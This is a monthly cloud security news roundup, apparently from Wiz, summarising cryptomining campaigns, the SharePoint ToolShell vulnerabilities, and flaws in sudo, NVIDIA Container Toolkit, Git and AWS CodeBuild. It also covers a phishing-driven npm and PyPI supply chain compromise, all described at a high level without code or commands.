Welcome back! This month we’ve seen a lot of action, with both vulnerabilities and security incidents that have left users affected. We bring you the latest cloud security highlights, to help you stay informed and stay secure. Let's dive in.
🔍 Highlights
Soco404 Cryptomining Campaign Exploits PostgreSQL and Cloud Misconfigurations
Wiz Research has uncovered the Soco404 campaign. A sophisticated, multi-platform cryptomining operation targeting cloud environments through exposed PostgreSQL instances, vulnerable Apache Tomcat servers, and other misconfigurations. The campaign delivers Linux and Windows payloads via fake 404 error pages embedded with base64 malware hosted on compromised or deceptive websites, including Google Sites and fraudulent crypto platforms. The attackers use a combination of obfuscated loaders, masquerading techniques, local socket communication, and persistence mechanisms such as cron jobs and shell profile modifications. On Windows, malware execution involves abuse of certutil, PowerShell, and system services, with payloads dropping additional miners and the WinRing0.sys driver. The operation appears to be part of a broader crypto-scam infrastructure, leveraging both social engineering and infrastructure compromise to sustain long-term mining activity.
0day Vulnerability in Microsoft Sharepoint Exploited in-the-Wild
Two newly disclosed vulnerabilities in on-premises SharePoint Servers—CVE-2025-53770 (RCE, CVSS 9.8) and CVE-2025-53771 (auth bypass, CVSS 6.3)—have been chained in the ToolShell exploit to enable unauthenticated remote code execution. Both are bypasses of earlier patched bugs (CVE-2025-49704 and CVE-2025-49706), prompting Microsoft to issue emergency updates after attackers discovered new exploitation paths. These flaws do not affect SharePoint Online.
According to Wiz data, when these vulnerabilities were first published, 9% of cloud environments have resources running vulnerable versions of self-managed SharePoint. After a few days of remediation efforts, that number dropped to 5%.
🐞 High Profile Vulnerabilities
Critical Privilege Escalation in SUDO
A set of vulnerabilities in sudo enables local attackers to escalate privileges, bypass host restrictions, and enumerate privileged users. The most severe, CVE-2025-32463, allows unprivileged users to gain root access via the --chroot flag and malicious nsswitch.conf configurations.
Critical Vulnerability in NVIDIA Container Toolkit
Wiz Research uncovered a critical vulnerability, CVE-2025-23266, in the widely used NVIDIA Container Toolkit and NVIDIA GPU Operator. The vulnerability allows attackers with control over a container image to escape the container and gain full access to the underlying host. Additionally, NVIDIA disclosed CVE-2025-23267, a high severity vulnerability affecting the same version ranges of these products. It is strongly recommended to update to the latest version of both products (1.17.8 and 25.3.1, respectively), while focusing on container hosts that might run untrusted container images.
According to Wiz data, 37% of cloud environments have resources vulnerable to CVE-2025-23266.
Arbitrary File Write Vulnerability in Git
Git has patched CVE-2025-48384, a high-severity (CVSS 8.1) vulnerability affecting Git CLI on Linux and macOS. The flaw enables arbitrary file writes and potential remote code execution (RCE) when cloning weaponized repositories using the git clone --recursive command. GitHub Desktop for macOS is also vulnerable, and public proof-of-concept exploits are available, increasing the exploitation risk.
AWS CodeBuild Vulnerability Allows Build Process Secrets Extraction
AWS has announced an issue with CodeBuild that was used to compromise the Amazon Q Developer Extension for Visual Studio. AWS CodeBuild is a service that is used to execute code after events against source code repositories, such as Pull Requests. The CodeBuild issue has been assigned CVE-2025-8217. It is recommended to ensure no untrusted contributors are able to execute CodeBuild build processes.
🔒 Security Incidents & Campaigns
Exposed JDWP Exploited in the Wild
Wiz Research discovered active exploitation of exposed Java Debug Wire Protocol (JDWP) interfaces, allowing attackers to gain remote code execution on misconfigured servers. In one case, a vulnerable TeamCity instance was compromised within hours, leading to the deployment of a stealthy, customized XMRig cryptominer disguised as the logrotate utility. The attacker used JDWP to inject commands, downloaded a dropper script (logservice.sh), and established persistence via cron jobs, systemd services, and shell startup files.
Linuxsys Cryptominer Campaign
The Linuxsys cryptominer has been part of a quiet but persistent campaign since 2021, exploiting known vulnerabilities like CVE-2021-41773. Attackers use compromised, legitimate websites to host payloads and configuration files, making detection difficult. A script (linux.sh) fetches the miner and installs persistence via `cron.sh`. Despite modest payouts, the operation continues across hundreds of infected machines.
UNC5174 Exploits Ivanti CSA Vulnerabilities in “Houken” Campaign
ANSSI has attributed a cyber campaign targeting multiple French sectors to the Houken intrusion set, linked to China-nexus threat actor UNC5174. This campaign exploited three zero-day vulnerabilities in Ivanti Cloud Service Appliance (CSA) — CVE-2024-8190, CVE-2024-8963, and CVE-2024-9380 — to gain initial access, deploy persistence mechanisms including a rootkit, and facilitate credential theft, lateral movement, cryptomining, and possible intelligence collection.
Supply Chain Attack on npm and Pypi Packages via Maintainer Phishing
A targeted phishing attack led to the compromise of multiple popular npm and Pypi packages, including eslint-config-prettier, eslint-plugin-prettier, synckit, @pkgr/core, napi-postinstall, num2words, is and got-fetch. The attacker stole the npm token of the packages' maintainer, enabling the publication of malicious versions that deliver malware to Windows systems during package installation.
Hold on to your headphones!
Tune in to Crying Out Cloud, our monthly roundup of cloud security news podcast! Hosted by the talented duo Eden Naftali and Amitai Cohen ✋
Listen on Spotify and Apple Podcasts.